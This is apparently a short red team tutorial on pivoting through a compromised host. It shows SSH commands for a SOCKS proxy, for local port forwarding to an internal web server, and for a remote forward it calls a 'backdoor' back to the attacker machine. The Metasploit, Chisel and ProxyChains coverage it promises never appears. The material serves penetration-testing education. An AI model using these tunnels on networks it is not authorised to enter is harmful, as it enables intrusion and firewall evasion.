Pivoting is an essential Red Team technique that allows attackers to move laterally inside a compromised network. In this tutorial, we will cover advanced pivoting techniques using SSH, Metasploit, Chisel, and ProxyChains.
Pivoting is the technique of using a compromised system as a foothold to access internal resources that are otherwise inaccessible. This allows penetration testers to bypass firewall restrictions and move deeper into the network.
Pivoting Techniques
ssh -D 9050 -N -f user@192.168.1.50
SSH Local & Remote Port Forwarding
Local Port Forwarding (Access internal RDP/HTTP ports):
ssh -L 8080:10.10.10.5:80 user@192.168.1.50
Now, access the internal web server at:
http://127.0.0.1:8080
Remote Port Forwarding (Create a backdoor from the pivot to the attacker machine):
ssh -R 9000:127.0.0.1:22 user@192.168.1.50
Now, connect from the attacker machine:
ssh -p 9000 user@127.0.0.1
0 Comments